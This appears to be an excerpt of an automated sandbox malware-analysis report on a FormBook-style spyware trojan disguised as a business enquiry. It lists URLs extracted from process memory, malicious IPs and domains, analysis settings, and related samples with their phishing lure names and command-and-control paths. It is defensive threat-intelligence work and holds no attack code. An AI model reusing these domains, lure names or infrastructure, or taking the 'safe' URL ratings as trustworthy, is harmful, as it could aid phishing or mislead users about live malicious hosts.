                                        http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.selectric.min.js?ver=1.9.6SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.zhongyicts.com.cnENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/webfont.jsSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.waidzeitcz.shop/wp-content/plugins/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?vSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.waidzeitcz.shop/wp-content/themes/porto/js/woocommerce-theme.js?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://schema.org/BreadcrumbListSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/shortcodes//assets/cp-attribute-taSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://schema.orgSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/owl.carousel.min.js?ver=2.3.4SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.3SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://schema.org/ListItemSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/shortcodes.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.comlENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.waidzeitcz.shop/wp-admin/admin-ajax.phpSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=7.8SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-user.htmlENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.miSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.waidzeitcz.shop/wp-json/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.waidzeitcz.shop/cart/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/js/yith-wcan-sSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.jsSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.waidzeitcz.shop/feed/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designersGENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/?ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/bTheENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.waidzeitcz.shop/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers?ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.tiro.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://gmpg.org/xfn/11SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.goodfont.co.krENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/live-search/live-search.min.js?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme.js?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slntSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.typography.netDENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/staff/dennis.htmENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.waidzeitcz.shop/wp-content/plugins/revslider/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.jSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/login-style/account-login.css?ver=SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://rankmath.com/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.mSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.waidzeitcz.shop/shop/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fonts.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.sandoll.co.krENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.magnific-popup.min.js?ver=1.1.0SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.sakkal.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.waidzeitcz.shop/wishlist/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/css/shortcodesSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.apache.org/licenses/LICENSE-2.0ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_shop.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.windowmart.onlinebdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/woocommerce-shipping-progress-bar/shippinSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://api.w.org/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.waidzeitcz.shop/my-account/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                75.2.103.23
                                                                                                		www.asklifeclarity.shopUnited States
                                                                                                		16509AMAZON-02UStrue
                                                                                                162.0.231.203
                                                                                                		www.windowmart.onlineCanada
                                                                                                		22612NAMECHEAP-NETUStrue
                                                                                                172.67.163.171
                                                                                                		www.waidzeitcz.shopUnited States
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                3.33.130.190
                                                                                                		ontoweightloss.healthUnited States
                                                                                                		8987AMAZONEXPANSIONGBtrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1550102
                                                                                                Start date and time:2024-11-06 13:40:07 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 9m 14s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:10
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:ENQUIRY LED LIGHTS.pif.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@9/2@6/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 75%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 97%
                                                                                                • Number of executed functions: 117
                                                                                                • Number of non-executed functions: 317
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target bdtKgWWjtPR.exe, PID 4432 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: ENQUIRY LED LIGHTS.pif.exe

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                07:41:01API Interceptor3x Sleep call for process: ENQUIRY LED LIGHTS.pif.exe modified
                                                                                                07:42:28API Interceptor593780x Sleep call for process: SearchFilterHost.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                75.2.103.23Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.heeraka.info/o7wc/
                                                                                                rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.webeuz.buzz/pw0n/
                                                                                                quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.webeuz.buzz/pw0n/
                                                                                                AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.heeraka.info/o7wc/
                                                                                                PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.webeuz.buzz/okq4/
                                                                                                162.0.231.203IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.givora.site/855d/
                                                                                                debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.sibeta.info/4ecw/
                                                                                                NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.givora.site/855d/
                                                                                                18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.givora.site/855d/
                                                                                                WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • www.vovexa.site/wcr8/
                                                                                                mm.exeGet hashmaliciousUnknownBrowse
                                                                                                • www.rexima.top/uap5/
                                                                                                FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • www.ruarlo.xyz/443n/
                                                                                                PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • www.givora.site/855d/
                                                                                                3.33.130.190Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                • www.econsultoria.online/azb9/
                                                                                                icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.mythkitchen.net/jpec/
                                                                                                PO_11000262.vbsGet hashmaliciousFormBookBrowse
                                                                                                • www.ortenckt.online/5w7h/
                                                                                                SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.yourwebbuzz.net/84o5/
                                                                                                IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.7fh27o.vip/l5ty/
                                                                                                56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.godskids.store/5g7z/
                                                                                                NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.energyparks.net/xw1o/
                                                                                                UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.tracy.club/fl4z/
                                                                                                H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.bearableguy.net/m3fv/
                                                                                                p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.godskids.store/5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                www.windowmart.onlineRFQ-230802024.PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                • 203.161.42.158

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSPO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                Offer-7839373637-8839373-Quote8992832.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                • 104.21.5.155
                                                                                                l7Y3XnM0rr.exeGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.213.173
                                                                                                https://rebrand.ly/32mqjh6Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.67.75.166
                                                                                                https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                                • 104.22.74.216
                                                                                                NOAH $$$$.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                • 104.26.13.205
                                                                                                https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.22.59.100
                                                                                                Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 188.114.96.3
                                                                                                AMAZON-02UShttps://rebrand.ly/32mqjh6Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 76.76.21.22
                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                • 3.170.115.60
                                                                                                https://tr.apsis.one/e/BQf6Ly_NQaGdZtIyE9-tng/3lrpV7lSSP2Z5s0c5xWdEg/ln_9BtzivhtI_KJQNj5kCuaI/vcJdXtLBbK596W10niZVw8e08muc2sIkVCjdxfo2wWNAJh03ylvMgHMGet hashmaliciousUnknownBrowse
                                                                                                • 108.138.7.67
                                                                                                SpamLog.pptxGet hashmaliciousUnknownBrowse
                                                                                                • 52.16.38.212
                                                                                                http://loginmcsoftmlcrosoftoni365.madrides.copypremium.com/?reactivador/ahora0D1%20/=YWxvbnNvYmFAbWFkcmlkLmVzGet hashmaliciousUnknownBrowse
                                                                                                • 34.252.123.246
                                                                                                https://media.nomadsport.net/Culture/SetCulture?culture=en&returnUrl=https://t.ly/qrCwtGet hashmaliciousUnknownBrowse
                                                                                                • 52.85.49.99
